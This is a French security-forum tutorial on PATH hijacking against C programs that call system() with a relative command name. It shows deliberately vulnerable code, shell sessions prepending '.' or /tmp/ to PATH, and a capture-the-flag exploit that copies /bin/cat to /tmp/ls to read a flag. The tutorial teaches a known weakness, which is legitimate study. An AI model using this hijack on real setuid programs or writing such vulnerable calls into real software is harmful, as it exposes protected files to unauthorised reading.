• STATISTIQUES
  • Il y a eu un total de 0 membres et 402 visiteurs sur le site dans les dernières 24h pour un total de 402 personnes!
    Membres: 2 260
    Discussions: 3 563
    Messages: 32 759
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Security Traps
    Site de challenge qui prétend être construit non pas dans le but de parfaire vos connaissances, mais plutôt dan...
    Challenges
    [EN] Defcon
    Lancé en 1992 par Dark Tangent, DEFCON est la plus ancienne et la plus grande conférence underground de...
    Hacking
    [EN] Astalavista
    JavaScript: 1, Exploit: 2, Crypto: 34, CrackIt: 15, Stegano: 8, Programming: 12, Logic: 36, Special: 6, Science: 4, Info...
    Challenges
    [EN] Exploit-db
    Une base de données d'exploits triés par genre (GHDB, Remote, Local, Web, DOS, ShellCode) à ...
    Vulnérabilités
    [FR] Le top web
    Nous offrons une sélection la plus large possible de resources webmaster gratuites, hébergement gratuit...
    Webmaster
    [EN] CS Tutoring Center
    Site de challenge spécialisé dans les challenges de programmation C++ et java cependant, d'autres langages pe...
    Challenges
    [FR] frameip
    le site de partage des connaissances du monde TCPIP
    Protocole

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




[Failles App] Faille de la fonction system()

Bonjour à tous ,
Pour me mettre dans le bain de la Sécurité Applicative, J'ai décidé de faire ce tutoriel sur "la failles system()".

Dans une premiere Partie nous allons voir pourquoi la fontcion system() de la libc, est faillible.

0x1 - Pourquoi la fonction system() est vulnerable :

Prenons comme exemple le code suivant :
Code :
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char **argv)
{
printf("----- Faille de la fonction Systeme ------\n Listing Directory Function \n");
system("ls");
printf("END\n");
exit(1);
}

La fonction system a pour argument "ls" , ce qui , executé listera le dossier courant de tout ces fichiers et dossiers.

1er resultat :
Citation :[18:19 sakiir@sakiir system] > gcc code.c -o code
[18:19 sakiir@sakiir system] > ./code
----- Faille de la fonction Systeme ------
Listing Directory Function
code code.c
END
[18:20 sakiir@sakiir system] >

Ici, dans le dossier courant on trouve le fichier executable "code" et la source "code.c".
la fonction system va executer l'argument dans le terminal.
essaons donc de mettre un fichier "ls" dans le dossier courant qui affichera "bonjour !" .
Ensuite , nous allons modifier la Variable d'envoronnement PATH , qui est equivalente a celle de windows ..
Exemple sous windows si on met un executable "hola.exe" dans le dossier "system32" , si on tape directement "hola" dans le terminal windows , alors le programme "hola.exe" s'executera.

Sous Linux c'est pareil tout les dossiers inclus dans PATH sont séparé par des ":".
exemple :
Citation :[18:23 sakiir@sakiir system] > echo $PATH
/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:26 sakiir@sakiir system] >

Le miens est long , mais peut importe on va le modifier et inclure le dossier courant à la Variable PATH comme ceci :

Citation :[18:27 sakiir@sakiir system] > export PATH=.:$PATH
[18:27 sakiir@sakiir system] > echo $PATH
.:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:28 sakiir@sakiir system] >

/*
"." signifie "DOSSIER COURANT"
*/

ainsi , si on tape "ls" dans le dossier ou se trouve le programme ls , on executera directement le programme "ls" du dossier et non "/bin/ls" .
exemple :

Citation :[18:30 sakiir@sakiir system] > /bin/ls
code code.c hello.c ls
[18:30 sakiir@sakiir system] > ls
bonjour !

0x2 - Exploitation dans un exemple :

Dans certains challenge on peut trouver le code suivant :

Code :
#include <stdio.h>
int main()
{
system("ls /dossier/dossier/flag");
}

Dans ce challenge on aurai uniquement acces en ecriture au dossier "/tmp/" , nous allons donc ajouter à la variable PATH le dossiser tmp comme ceci :
Citation :[18:36 sakiir@sakiir system] > export PATH=/tmp/:$PATH
[18:36 sakiir@sakiir system] > echo $PATH
/tmp/:/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
[18:36 sakiir@sakiir system] >

Voici ! Smile
Vous devinerez que cette fois ci, il faudra creer un programme dans le dossier tmp.
ce que j'ai fais , moi , c'est tout simplement executer ce code la :
Citation :cp /bin/cat /tmp/ls
Donc ici le programme cat est dans tmp avec le nom "ls".

Merci d'avoir prété intention à mon "Tutoriel" et à bientot !! Smile

New Project News White Hat Hacker V2.3
Accueil | Challenges | Tutoriels | Téléchargements | Forum